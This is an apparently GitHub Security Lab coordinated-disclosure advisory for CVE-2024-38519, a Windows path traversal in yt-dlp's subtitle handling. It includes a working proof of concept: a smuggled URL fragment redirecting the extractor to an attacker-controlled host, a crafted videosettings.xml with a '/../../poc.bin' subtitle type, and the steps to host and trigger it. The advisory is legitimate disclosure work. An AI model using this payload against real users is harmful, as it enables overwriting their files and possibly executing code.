Coordinated Disclosure Timeline
- 2024-05-24: A private vulnerability reporting was used to send the report to maintainers.
- 2024-05-24: The report was accepted.
- 2024-07-01: v2024.07.01 with the fix was released.
- 2024-07-01: The advisory was published.
Summary
yt-dlp
doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.
Project
yt-dlp
Tested Version
Details
Path traversal saving subtitles (GHSL-2024-090
)
yt-dlp
is capable of downloading not only video files, but also accompanying subtitles if the user specifies the --write-subs
, --write-auto-subs
, --all-subs
or --write-srt
option. Each supported video website has a dedicated extractor. Some extractors provide only URLs of subtitles and yt-dlp resolves their extension from the URL path. Others provide the URLs and the subtitle extensions explicitly. In turn, some of the latter extractors validate the extracted subtitle extension, but others trust the extracted value blindly. yt-dlp
honors the provided extension name and uses it to build the name of the output file for subtitles in [1]. The filename
is the generated name for the video file, sub_lang
is en
by default, sub_format
is the extracted subtitles extension and info_dict.get('ext')
contains the video file extension to replace with the sub_format
in subtitles_filename
. The subtitle is written as a binary file in [2]. If the user doesn’t override the default output file template %(title)s [%(id)s].%(ext)s
, then the sub_filename
is formatted as %(title)s [%(id)s].%(sub_lang).%(sub_format)s
. The path traversal injection in sub_format
doesn’t work on Linux because Linux doesn’t accept paths like not_existing_folder/../../file
. But it does work on Windows.
for sub_lang, sub_info in subtitles.items():
sub_format = sub_info['ext']
sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext')) # <------------- [1]
sub_filename_final = subtitles_filename(sub_filename_base, sub_lang, sub_format, info_dict.get('ext'))
existing_sub = self.existing_file((sub_filename_final, sub_filename))
if existing_sub:
self.to_screen(f'[info] Video subtitle {sub_lang}.{sub_format} is already present')
sub_info['filepath'] = existing_sub
ret.append((existing_sub, sub_filename_final))
continue
self.to_screen(f'[info] Writing video subtitles to: {sub_filename}')
#...
try:
sub_copy = sub_info.copy()
sub_copy.setdefault('http_headers', info_dict.get('http_headers'))
self.dl(sub_filename, sub_copy, subtitle=True) # <------------- [2]
sub_info['filepath'] = sub_filename
ret.append((sub_filename, sub_filename_final))
#...
Exploitability and Proof of Concept (PoC)
Intentionally crafted subtitle extension names in a supported website (such as youtube.com or bbc.co.uk) are not in the threat model of the report. However it is possible that the websites may be compromised at some moment of time. An XSS or SQL injection would allow the attacker to exploit a specific yt-dlp extractor. Then the attacker would need to wait for any yt-dlp user or trick a specific yt-dlp user to download the video with subtitles. However other yt-dlp features allow exploitation without compromising the video hosting website:
- URL smuggling. Some yt-dlp extractors attempt to get additional information from the URL part that comes after
#
- the fragment. The fragment is URL decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1] and retrievesbase_url
from it [2] and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked to run, for example,yt-dlp --write-subs https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D
it will use an XML file from an attacker controlled site,site.com
in this case, to extract subtitles and video files.url, smuggled_data = unsmuggle_url(url, {}) <------------- [1] mobj = self._match_valid_url(url) course_id = mobj.group('course_id') video_id = mobj.group('id') base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id) <------------- [2] settings = self._download_xml( '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id), <------------- [3] video_id, 'Downloading video settings XML')
- Generic extractor.
yt-dlp
allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a yt-dlp user. The user needs to run onlyyt-dlp --write-subs https://attacker.com/poc.html
For a PoC:
- Create a folder with the following
poc.html
:
<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
- Create two subfolders
content/content_gfVXISmEB_6804984382
in the folder wherepoc.html
resides. - Create the following
videosettings.xml
in thecontent_gfVXISmEB_6804984382
folder:
<videoSettings version="1.5">
<PlaylistItems>
<PlaylistItem>
<MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
<MediaSource />
<Title>01 | Introduction</Title>
<MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
<ThumbSource />
</PlaylistItem>
</PlaylistItems>
</videoSettings>
- Create arbitrary file
subtitles
in thecontent_gfVXISmEB_6804984382
folder. - Host the folder with
poc.html
withpython3 -m http.server
- On Windows run
yt-dlp --write-subs http://127.0.0.1:8000/poc.html
yt-dlp
creates a filepoc.bin
one level up from the current folder as long as the running user has sufficient permissions.
Impact
This issue may lead to unauthorized file system modification and later may lead to remote code execution if an executable file is overwritten.
CVE
- CVE-2024-38519
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2024-090
in any communication regarding this issue.